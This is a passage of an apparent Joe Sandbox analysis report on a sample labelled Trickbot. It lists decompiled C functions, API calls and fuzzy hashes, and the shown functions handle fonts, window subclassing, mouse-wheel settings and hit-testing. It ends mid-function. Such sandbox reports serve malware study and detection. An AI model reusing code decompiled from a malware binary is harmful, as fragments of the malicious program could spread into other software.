                            • Part of subcall function 004330FA: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433147
                            • Part of subcall function 004330FA: LeaveCriticalSection.KERNEL32(0044B558,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433150
                            • Part of subcall function 004330FA: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D,0041C011), ref: 00433162
                          • LoadBitmapA.USER32(?,00007912), ref: 0042F2A0
                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0042F2B2
                          • GetSystemMetrics.USER32(0000002A), ref: 0042F2FC
                          • lstrcpyA.KERNEL32(?,Small Fonts,?,0000000A), ref: 0042F316
                          • CreateFontIndirectA.GDI32(?), ref: 0042F336
                          • SelectObject.GDI32(?,00000000), ref: 0042F366
                          • GetTextMetricsA.GDI32(?,?), ref: 0042F378
                          • SelectObject.GDI32(?,00000000), ref: 0042F389
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalSection$Object$EnterMetricsSelect$BitmapCreateFontH_prologIndirectInitializeLeaveLoadSystemTextlstrcpy
                          • String ID: $Small Fonts$Terminal
                          • API String ID: 1234877182-3042510724
                          • Opcode ID: d3f802850265f098d50966ea408fdaa0929af5969bf12728ac1da03c61b3434d
                          • Instruction ID: 219b476f64bc7fdea7f6c7d6ea1d618f6714e8619a5fe76a679f0cae40a0b0cc
                          • Opcode Fuzzy Hash: d3f802850265f098d50966ea408fdaa0929af5969bf12728ac1da03c61b3434d
                          • Instruction Fuzzy Hash: 69419F75A003199FDB10DFB5EC89AAEB7B8FB44304F90503AE801E3291D7B89D05CB68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00410660(struct HWND__* _a4, long _a8) {
                          				char _v16;
                          				void* _t7;
                          				struct HWND__* _t29;
                          
                          				_t29 = _a4;
                          				_t7 = GetPropA(_t29, 0);
                          				if(_t7 == 0) {
                          					_t7 = GetPropA(_t29, 0);
                          					if(_t7 == 0) {
                          						_t7 = GetPropA(_t29, 0);
                          						if(_t7 == 0) {
                          							_t7 = GetPropA(_t29, 0);
                          							if(_t7 == 0) {
                          								_t7 = GetPropA(_t29, 0);
                          								if(_t7 == 0) {
                          									_t7 = GetPropA(_t29, 0);
                          									if(_t7 == 0) {
                          										_t7 = E004105F0(_t29);
                          										if(_t7 == 0) {
                          											if( *0x44de45 != 0 && IsWindowUnicode(_t29) == 0) {
                          												GetClassNameA(_t29,  &_v16, 0x10);
                          												lstrcmpiA( &_v16, "edit");
                          											}
                          											return SetPropA(_t29, 0, SetWindowLongA(_t29, 0xfffffffc, _a8));
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          				}
                          				return _t7;
                          			}

                          APIs
                          • GetPropA.USER32(?,00000000), ref: 00410679
                          • GetPropA.USER32(?,00000000), ref: 0041068D
                          • GetPropA.USER32(?,00000000), ref: 004106A1
                          • GetPropA.USER32(?,00000000), ref: 004106B5
                          • GetPropA.USER32(?,00000000), ref: 004106C9
                          • GetPropA.USER32(?,00000000), ref: 004106D9
                          • IsWindowUnicode.USER32(?), ref: 004106F6
                          • GetClassNameA.USER32(?,?,00000010), ref: 00410708
                          • lstrcmpiA.KERNEL32(?,edit), ref: 00410718
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00410728
                          • SetPropA.USER32(?,00000000,00000000), ref: 00410739
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Prop$Window$ClassLongNameUnicodelstrcmpi
                          • String ID: edit
                          • API String ID: 4088303749-2167791130
                          • Opcode ID: f36042ec29b1b8a59c76c230e32340138c86ac5640fdab9cc2f75527457e0a77
                          • Instruction ID: e7b4950ba27239ceebb0593ff6ed2a0e1363c1adbdf2a17cd7b5dbcb592423dd
                          • Opcode Fuzzy Hash: f36042ec29b1b8a59c76c230e32340138c86ac5640fdab9cc2f75527457e0a77
                          • Instruction Fuzzy Hash: B421516A6011127AA751BB789D04EFF27DCAF59684B000535FD54C1150F7A8DDC2CB7E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041FABD() {
                          				void* _v8;
                          				int _v12;
                          				int _v16;
                          				char _v144;
                          				void _t9;
                          				struct HWND__* _t20;
                          				void _t21;
                          				int _t22;
                          				int _t23;
                          				int _t27;
                          				short _t28;
                          				intOrPtr _t30;
                          
                          				_t27 =  *0x449794; // 0x0
                          				if(_t27 != 0) {
                          					L16:
                          					_t9 =  *0x44b120; // 0x0
                          					return _t9;
                          				}
                          				_t28 =  *0x44b11c; // 0x0
                          				 *0x449794 = 1;
                          				if(_t28 != 0) {
                          					L10:
                          					__eflags =  *0x44b11c - 2;
                          					if( *0x44b11c != 2) {
                          						L4:
                          						_t30 =  *0x44b354; // 0x1
                          						 *0x44b120 = 3;
                          						if(_t30 != 0) {
                          							__eflags =  *0x44b350; // 0x0
                          							if(__eflags == 0) {
                          								SystemParametersInfoA(0x68, 0, 0x44b120, 0);
                          							}
                          						} else {
                          							if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop", 0, 1,  &_v8) == 0) {
                          								_v12 = 0x80;
                          								if(RegQueryValueExA(_v8, "WheelScrollLines", 0,  &_v16,  &_v144,  &_v12) == 0) {
                          									 *0x44b120 = E00405B68( &_v144, 0, 0xa);
                          								}
                          								RegCloseKey(_v8);
                          							}
                          						}
                          						goto L16;
                          					}
                          					_t20 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                          					__eflags = _t20;
                          					if(_t20 == 0) {
                          						goto L4;
                          					}
                          					_t23 =  *0x44b118; // 0x0
                          					__eflags = _t23;
                          					if(_t23 == 0) {
                          						goto L4;
                          					}
                          					_t21 = SendMessageA(_t20, _t23, 0, 0);
                          					 *0x44b120 = _t21;
                          					return _t21;
                          				}
                          				_t22 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
                          				 *0x44b118 = _t22;
                          				if(_t22 != 0) {
                          					 *0x44b11c = 2;
                          					goto L10;
                          				} else {
                          					 *0x44b11c = 1;
                          					goto L4;
                          				}
                          			}

                          0x0041fac9
                          0x0041facf
                          0x0041fbf2
                          0x0041fbf2
                          0x00000000
                          0x0041fbf2
                          0x0041fad5
                          0x0041fadc
                          0x0041fae6
                          0x0041fb96
                          0x0041fb96
                          0x0041fb9e
                          0x0041fb0d
                          0x0041fb0d
                          0x0041fb13
                          0x0041fb1d
                          0x0041fbdb
                          0x0041fbe1
                          0x0041fbec
                          0x0041fbec
                          0x0041fb23
                          0x0041fb3c
                          0x0041fb45
                          0x0041fb69
                          0x0041fb7d
                          0x0041fb7d
                          0x0041fb85
                          0x0041fb85
                          0x0041fb3c
                          0x00000000
                          0x0041fb1d
                          0x0041fbae
                          0x0041fbb4
                          0x0041fbb6
                          0x00000000
                          0x00000000
                          0x0041fbbc
                          0x0041fbc2
                          0x0041fbc4
                          0x00000000
                          0x00000000
                          0x0041fbce
                          0x0041fbd4
                          0x00000000
                          0x0041fbd4
                          0x0041faf1
                          0x0041faf9
                          0x0041fafe
                          0x0041fb8d
                          0x00000000
                          0x0041fb04
                          0x0041fb04
                          0x00000000
                          0x0041fb04

                          APIs
                          • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG), ref: 0041FAF1
                          • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop,00000000,00000001,?), ref: 0041FB34
                          • RegQueryValueExA.ADVAPI32(?,WheelScrollLines,00000000,?,?,?), ref: 0041FB61
                          • RegCloseKey.ADVAPI32(?), ref: 0041FB85
                          • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 0041FBAE
                          • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0041FBCE
                          • SystemParametersInfoA.USER32(00000068,00000000,0044B120,00000000), ref: 0041FBEC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MessageWindow$CloseFindInfoOpenParametersQueryRegisterSendSystemValue
                          • String ID: Control Panel\Desktop$MSH_SCROLL_LINES_MSG$Magellan MSWHEEL$MouseZ$WheelScrollLines
                          • API String ID: 1228133072-821443377
                          • Opcode ID: 5c0ba1b7cf31be68934b38c43d84f9e3d86228405ce0235e948782c6e4e3011e
                          • Instruction ID: 50c4481848f6c20c1b5d52b323461859e73a832251f40a79bd6bd37f3963a02b
                          • Opcode Fuzzy Hash: 5c0ba1b7cf31be68934b38c43d84f9e3d86228405ce0235e948782c6e4e3011e
                          • Instruction Fuzzy Hash: 35216574904228EADB209F61DC69FEB7B78FB09791F104136F40592250D7B89989CBED
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E0042E799(void* __ecx, CHAR* _a4) {
                          				char _v520;
                          				intOrPtr _t36;
                          				intOrPtr _t45;
                          				void* _t55;
                          				void* _t56;
                          
                          				_t55 = __ecx;
                          				if((E0041B66F(__ecx) & 0x00000040) == 0) {
                          					lstrcpyA( &_v520,  *(__ecx + 0xac));
                          					if(_a4 != 0) {
                          						lstrcatA( &_v520, " - ");
                          						lstrcatA( &_v520, _a4);
                          						_t36 =  *((intOrPtr*)(_t55 + 0x40));
                          						if(_t36 > 0) {
                          							_push(_t36);
                          							wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
                          						}
                          					}
                          					L9:
                          					return E004226A8( *((intOrPtr*)(_t55 + 0x1c)),  &_v520);
                          				}
                          				_v520 = _v520 & 0x00000000;
                          				if(_a4 == 0) {
                          					L5:
                          					lstrcatA( &_v520,  *(_t55 + 0xac));
                          					goto L9;
                          				}
                          				lstrcpyA( &_v520, _a4);
                          				_t45 =  *((intOrPtr*)(_t55 + 0x40));
                          				if(_t45 > 0) {
                          					_push(_t45);
                          					wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
                          				}
                          				lstrcatA( &_v520, " - ");
                          				goto L5;
                          			}

                          0x0042e7a4
                          0x0042e7ae
                          0x0042e82a
                          0x0042e834
                          0x0042e848
                          0x0042e854
                          0x0042e856
                          0x0042e85b
                          0x0042e85d
                          0x0042e878
                          0x0042e87e
                          0x0042e85b
                          0x0042e881
                          0x0042e893
                          0x0042e893
                          0x0042e7b0
                          0x0042e7c1
                          0x0042e80c
                          0x0042e819
                          0x00000000
                          0x0042e819
                          0x0042e7cd
                          0x0042e7d3
                          0x0042e7d8
                          0x0042e7da
                          0x0042e7f5
                          0x0042e7fb
                          0x0042e80a
                          0x00000000

                          APIs
                            • Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B
                          • lstrcpyA.KERNEL32(00000000,00000000), ref: 0042E7CD
                          • lstrlenA.KERNEL32(00000000,:%d,?), ref: 0042E7E7
                          • wsprintfA.USER32 ref: 0042E7F5
                          • lstrcatA.KERNEL32(00000000, - ), ref: 0042E80A
                          • lstrcatA.KERNEL32(00000000,?), ref: 0042E819
                          • lstrcpyA.KERNEL32(?,?), ref: 0042E82A
                          • lstrcatA.KERNEL32(?, - ), ref: 0042E848
                          • lstrcatA.KERNEL32(?,00000000), ref: 0042E854
                          • lstrlenA.KERNEL32(?,:%d,?), ref: 0042E86A
                          • wsprintfA.USER32 ref: 0042E878
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: lstrcat$lstrcpylstrlenwsprintf$LongWindow
                          • String ID: - $:%d
                          • API String ID: 3078587954-2359489159
                          • Opcode ID: ae8aacf59fbcbd5401ef4bd275cd5d505c81a2293181c0eb114b17a30bd14ef3
                          • Instruction ID: 4dd73163ec7d7a262f117d5d3406d315a6e0ef4dc42e90b0c75c7a1bc7bf7c61
                          • Opcode Fuzzy Hash: ae8aacf59fbcbd5401ef4bd275cd5d505c81a2293181c0eb114b17a30bd14ef3
                          • Instruction Fuzzy Hash: 50215EB190031EABCF20BB65DD8CFDA7BACBB44304F108462BA55E3151D678EA45CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E00436460(intOrPtr* __ecx) {
                          				struct tagSIZE _v12;
                          				int _v16;
                          				struct tagSIZE _v24;
                          				void* _v28;
                          				int _v32;
                          				struct tagLOGFONTA _v92;
                          				struct tagTEXTMETRICA _v148;
                          				void* _t64;
                          				long _t70;
                          				void* _t79;
                          				signed int _t83;
                          				signed int _t84;
                          				void* _t91;
                          				int _t117;
                          				void* _t119;
                          				void** _t122;
                          
                          				_t121 = __ecx;
                          				if( *(__ecx + 8) != 0) {
                          					_t64 =  *(__ecx + 0x2c);
                          					if(_t64 == 0) {
                          						_push(0xe);
                          						return  *((intOrPtr*)( *__ecx + 0x24))();
                          					}
                          					if( *((intOrPtr*)(__ecx + 4)) != 0) {
                          						GetObjectA(_t64, 0x3c,  &_v92);
                          						GetTextFaceA( *(__ecx + 8), 0x20,  &(_v92.lfFaceName));
                          						GetTextMetricsA( *(__ecx + 8),  &_v148);
                          						_t70 = _v148.tmHeight;
                          						if(_t70 >= 0) {
                          							_v92.lfHeight = _v148.tmInternalLeading - _t70;
                          						} else {
                          							_v92.lfHeight = _t70;
                          						}
                          						_v92.lfWidth = _v148.tmAveCharWidth;
                          						_v92.lfWeight = _v148.tmWeight;
                          						_v92.lfItalic = _v148.tmItalic;
                          						_v92.lfUnderline = _v148.tmUnderlined;
                          						_v92.lfStrikeOut = _v148.tmStruckOut;
                          						_v92.lfCharSet = _v148.tmCharSet;
                          						_v92.lfPitchAndFamily = _v148.tmPitchAndFamily;
                          						_t79 = CreateFontIndirectA( &_v92);
                          						_v28 = _t79;
                          						SelectObject( *(_t121 + 4), _t79);
                          						GetTextMetricsA( *(_t121 + 4),  &_v148);
                          						_t83 = _v148.tmHeight;
                          						_t117 =  ~(_v92.lfHeight);
                          						if(_t83 >= 0) {
                          							_t84 = _t83 - _v148.tmInternalLeading;
                          						} else {
                          							_t84 =  ~_t83;
                          						}
                          						_v16 = _t84;
                          						GetWindowExtEx( *(_t121 + 4),  &_v12);
                          						GetViewportExtEx( *(_t121 + 4),  &_v24);
                          						if(_v12.cy < 0) {
                          							_v12.cy =  ~(_v12.cy);
                          						}
                          						if(_v24.cy < 0) {
                          							_v24.cy =  ~(_v24.cy);
                          						}
                          						_v32 = MulDiv(_t117, _v24.cy, _v12.cy);
                          						if(_v32 >= MulDiv(_v16, _v24.cy, _v12.cy)) {
                          							_t119 = _v28;
                          						} else {
                          							_v92.lfFaceName = _v92.lfFaceName & 0x00000000;
                          							_v92.lfPitchAndFamily = (_v92.lfPitchAndFamily & 0 | (_v92.lfPitchAndFamily & 0x000000f0) != 0x00000050) - 0x00000001 & 0x00000050;
                          							_t119 = CreateFontIndirectA( &_v92);
                          							SelectObject( *(_t121 + 4), _t119);
                          							DeleteObject(_v28);
                          						}
                          						_t122 = _t121 + 0x28;
                          						_t91 = E00422700(_t122);
                          						 *_t122 = _t119;
                          						return _t91;
                          					}
                          				}
                          				return _t64;
                          			}

                          0x0043646a
                          0x00436470
                          0x00436476
                          0x0043647b
                          0x0043647f
                          0x00000000
                          0x00436481
                          0x0043648d
                          0x0043649c
                          0x004364ab
                          0x004364c1
                          0x004364c3
                          0x004364cb
                          0x004364da
                          0x004364cd
                          0x004364cd
                          0x004364cd
                          0x004364e6
                          0x004364ec
                          0x004364f2
                          0x004364f8
                          0x004364fe
                          0x00436504
                          0x0043650a
                          0x00436511
                          0x00436514
                          0x0043651a
                          0x0043652a
                          0x0043652f
                          0x00436535
                          0x00436539
                          0x0043653f
                          0x0043653b
                          0x0043653b
                          0x0043653b
                          0x00436545
                          0x0043654f
                          0x0043655c
                          0x00436566
                          0x0043656d
                          0x0043656d
                          0x00436574
                          0x0043657b
                          0x0043657b
                          0x00436590
                          0x0043659e
                          0x004365d2
                          0x004365a0
                          0x004365a3
                          0x004365b2
                          0x004365bb
                          0x004365c1
                          0x004365ca
                          0x004365ca
                          0x004365d5
                          0x004365d9
                          0x004365de
                          0x00000000
                          0x004365e1
                          0x0043648d
                          0x004365e4

                          APIs
                          • GetObjectA.GDI32(?,0000003C,?), ref: 0043649C
                          • GetTextFaceA.GDI32(00000000,00000020,?), ref: 004364AB
                          • GetTextMetricsA.GDI32(00000000,?), ref: 004364C1
                          • CreateFontIndirectA.GDI32(?), ref: 00436511
                          • SelectObject.GDI32(00000000,00000000), ref: 0043651A
                          • GetTextMetricsA.GDI32(00000000,?), ref: 0043652A
                          • GetWindowExtEx.GDI32(00000000,00000000), ref: 0043654F
                          • GetViewportExtEx.GDI32(00000000,?), ref: 0043655C
                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 0043658B
                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 00436599
                          • CreateFontIndirectA.GDI32(?), ref: 004365B9
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Text$CreateFontIndirectMetricsObject$FaceSelectViewportWindow
                          • String ID:
                          • API String ID: 3870699365-0
                          • Opcode ID: 93f3913775e0e2bd4684e3c02a016076f5a16590feaf4255d8edee53c4cd0bb8
                          • Instruction ID: d9bbd871c1efa42dcf5c24b6303bed0624cdd6504f943b67eccbbb98aca6ccf1
                          • Opcode Fuzzy Hash: 93f3913775e0e2bd4684e3c02a016076f5a16590feaf4255d8edee53c4cd0bb8
                          • Instruction Fuzzy Hash: 32514331C0025AEFDF21CFE9D845AEEBBB8AF08300F14806AE456A7265D3749A46DF14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E00413AC0(intOrPtr _a4, intOrPtr _a8) {
                          				_Unknown_base(*)()* _v4;
                          				_Unknown_base(*)()* _t8;
                          				signed int _t9;
                          				signed short _t19;
                          				intOrPtr _t21;
                          
                          				if(_a8 == 1) {
                          					_t8 = GetProcAddress(GetModuleHandleA("KERNEL32.DLL"), "DisableThreadLibraryCalls");
                          					_t21 = _a4;
                          					_v4 = _t8;
                          					if(_t8 != 0) {
                          						_v4(_t21);
                          					}
                          					EnterCriticalSection(0x44d320);
                          					 *0x44d35c = _t21;
                          					 *0x44d358 = _t21;
                          					_t9 = GetVersion();
                          					_t19 = (_t9 & 0x000000ff) << 0x00000008 | _t9 & 0x000000ff;
                          					 *0x44d360 = _t19;
                          					if((_t9 & 0x80000000) == 0) {
                          						L5:
                          						 *0x44d362 = 0x20;
                          					} else {
                          						 *0x44d362 = 0x10;
                          						if(_t19 >= 0x35f) {
                          							goto L5;
                          						}
                          					}
                          					 *0x44de34 = GetSystemMetrics(7) - 1;
                          					 *0x44de38 = GetSystemMetrics(8) - 1;
                          					 *0x44de3c = GetSystemMetrics(4);
                          					 *0x44de40 = GetSystemMetrics(0x1e);
                          					LeaveCriticalSection(0x44d320);
                          				}
                          				return 1;
                          			}

                          0x00413ac9
                          0x00413ae0
                          0x00413ae6
                          0x00413aea
                          0x00413af0
                          0x00413af3
                          0x00413af3
                          0x00413afc
                          0x00413b02
                          0x00413b08
                          0x00413b0e
                          0x00413b20
                          0x00413b28
                          0x00413b2f
                          0x00413b41
                          0x00413b41
                          0x00413b31
                          0x00413b31
                          0x00413b3f
                          0x00000000
                          0x00000000
                          0x00413b3f
                          0x00413b57
                          0x00413b61
                          0x00413b6a
                          0x00413b76
                          0x00413b7b
                          0x00413b7b
                          0x00413b8a

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?), ref: 00413AD4
                          • GetProcAddress.KERNEL32(00000000,DisableThreadLibraryCalls), ref: 00413AE0
                          • EnterCriticalSection.KERNEL32(0044D320), ref: 00413AFC
                          • GetVersion.KERNEL32 ref: 00413B0E
                          • GetSystemMetrics.USER32(00000007), ref: 00413B52
                          • GetSystemMetrics.USER32(00000008), ref: 00413B5C
                          • GetSystemMetrics.USER32(00000004), ref: 00413B66
                          • GetSystemMetrics.USER32(0000001E), ref: 00413B6F
                          • LeaveCriticalSection.KERNEL32(0044D320), ref: 00413B7B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MetricsSystem$CriticalSection$AddressEnterHandleLeaveModuleProcVersion
                          • String ID: DisableThreadLibraryCalls$KERNEL32.DLL
                          • API String ID: 1414939872-3863293605
                          • Opcode ID: bf8847e3d2f707688648f7e0ecd3ff4510742e97c87c4d8970bd3ceb6e8b9f61
                          • Instruction ID: 53e69021af04aa894e7cea32da7e39c2029532202f54e618df31dd379534d76f
                          • Opcode Fuzzy Hash: bf8847e3d2f707688648f7e0ecd3ff4510742e97c87c4d8970bd3ceb6e8b9f61
                          • Instruction Fuzzy Hash: 84117078D50714ABDB10AF64AC0979B3BA0FB06701F54447AED459B2A0D7B99848CF4E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E0042F64D(intOrPtr __ecx, struct tagPOINT _a4, intOrPtr _a8) {
                          				signed char _v6;
                          				signed int _v7;
                          				signed int _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				signed int _v28;
                          				struct tagRECT _v44;
                          				struct tagRECT _v60;
                          				struct tagRECT _v112;
                          				intOrPtr _t141;
                          				void* _t144;
                          				intOrPtr _t145;
                          				intOrPtr _t148;
                          				void* _t150;
                          				signed int _t151;
                          				void* _t161;
                          				int _t177;
                          				void* _t184;
                          				signed int _t188;
                          				void* _t190;
                          				signed int _t194;
                          				void* _t196;
                          				void* _t198;
                          				signed int _t205;
                          				int _t206;
                          				void* _t219;
                          				intOrPtr _t238;
                          				intOrPtr _t241;
                          				int _t243;
                          				signed int _t245;
                          				signed int _t246;
                          				int _t251;
                          
                          				_t241 = __ecx;
                          				_v16 = __ecx;
                          				_v8 = E0041B66F(__ecx);
                          				GetWindowRect( *(__ecx + 0x1c),  &_v44);
                          				_t205 = GetSystemMetrics(0x21);
                          				_v12 = _t205;
                          				_v28 = GetSystemMetrics(0x20);
                          				if( *0x44b35c != 0) {
                          					_t177 = E004187B4(_t241);
                          					_t251 = _t177;
                          					_t243 = 2;
                          					if( *0x44b354 == 0 || (_v7 & 0x00000010) == 0) {
                          						L6:
                          						if(_t251 < 0xa || _t251 > 0x11) {
                          							if(_t251 != 4) {
                          								goto L17;
                          							}
                          							goto L9;
                          						} else {
                          							L9:
                          							if((_v7 & 0x00000008) == 0) {
                          								InflateRect( &_v44,  ~_v28,  ~_t205);
                          								if((_v7 & 0x00000002) == 0) {
                          									L17:
                          									return _t251;
                          								}
                          								_t184 = _t251 - 4;
                          								if(_t184 == 0) {
                          									L22:
                          									_t188 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000004;
                          									L23:
                          									return _t188 + 0xb;
                          								}
                          								_t190 = _t184 - 9;
                          								if(_t190 == 0) {
                          									_t194 = (0 | _a8 - _v44.top >= 0x00000000) - 0x00000001 & _t243;
                          									L19:
                          									return _t194 + 0xa;
                          								}
                          								_t196 = _t190 - 1;
                          								if(_t196 == 0) {
                          									_t188 = 0 | _a8 - _v44.top < 0x00000000;
                          									goto L23;
                          								}
                          								_t198 = _t196 - _t243;
                          								if(_t198 == 0) {
                          									_t194 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000005;
                          									goto L19;
                          								}
                          								if(_t198 == 1) {
                          									goto L22;
                          								}
                          								goto L17;
                          							}
                          							return _t243;
                          						}
                          					} else {
                          						if(_t251 == 3) {
                          							_t251 = _t243;
                          						}
                          						if(GetKeyState(_t243) < 0) {
                          							L25:
                          							return 0;
                          						} else {
                          							goto L6;
                          						}
                          					}
                          				}
                          				_push(_a8);
                          				if(PtInRect( &_v44, _a4.x) == 0) {
                          					goto L25;
                          				}
                          				_t206 = GetSystemMetrics(6);
                          				_v20 = _t206;
                          				_t245 = GetSystemMetrics(5);
                          				_v112.top = _v44.top;
                          				_v112.left = _v44.left;
                          				_v112.bottom = _v44.bottom;
                          				_v112.right = _v44.right;
                          				_push( &_v112);
                          				E0042F5E7(0);
                          				CopyRect( &_v60,  &_v112);
                          				_push(_a8);
                          				if(PtInRect( &_v60, _a4.x) != 0) {
                          					_push(1);
                          					L61:
                          					_pop(_t144);
                          					return _t144;
                          				}
                          				if((_v8 & 0x00040600) == 0) {
                          					L56:
                          					_t141 =  *0x44b72c; // 0x0
                          					_push(_a8);
                          					_v44.bottom = _t206 + _t141 + _v44.top;
                          					if(PtInRect( &_v44, _a4.x) == 0) {
                          						_push(0xfffffffe);
                          						goto L61;
                          					}
                          					_t145 =  *0x44b728; // 0x0
                          					if(_a4.x >= _t145 + _v44.left - 2 || (_v6 & 0x00000008) == 0) {
                          						L54:
                          						_push(2);
                          					} else {
                          						_push(3);
                          					}
                          					goto L61;
                          				}
                          				_t246 = _v12;
                          				_t148 =  *0x44b728; // 0x0
                          				_t150 = _t148 - _t245 + _t245 * 2 + _v28;
                          				_t219 = _t246 - _t206 + _t206 +  *0x44b72c;
                          				if(_a8 >= _v44.top + _t246) {
                          					_t238 = _v44.bottom;
                          					if(_a8 < _t238 - _t246) {
                          						_t151 = _v28;
                          						if(_a4.x >= _v44.left + _t151) {
                          							if(_a4.x < _v44.right - _t151) {
                          								InflateRect( &_v44,  ~_t151,  ~_v12);
                          								_t206 = _v20;
                          								goto L56;
                          							}
                          							if((_v7 & 0x00000002) == 0) {
                          								if(_a8 > _v44.top + _t219) {
                          									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xb;
                          								} else {
                          									_push(0xe);
                          									goto L51;
                          								}
                          							} else {
                          								_push(0xb);
                          								goto L51;
                          							}
                          						} else {
                          							if((_v7 & 0x00000002) == 0) {
                          								if(_a8 <= _v44.top + _t219) {
                          									goto L33;
                          								} else {
                          									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xa;
                          								}
                          							} else {
                          								_push(0xa);
                          								goto L51;
                          							}
                          						}
                          					} else {
                          						if((_v7 & 0x00000002) == 0) {
                          							if(_a4.x > _v44.left + _t150) {
                          								_t161 = ((0 | _a4.x - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xf;
                          							} else {
                          								_push(0x10);
                          								goto L51;
                          							}
                          						} else {
                          							_push(0xf);
                          							goto L51;
                          						}
                          					}
                          				} else {
                          					if((_v7 & 0x00000002) == 0) {
                          						if(_a4.x > _v44.left + _t150) {
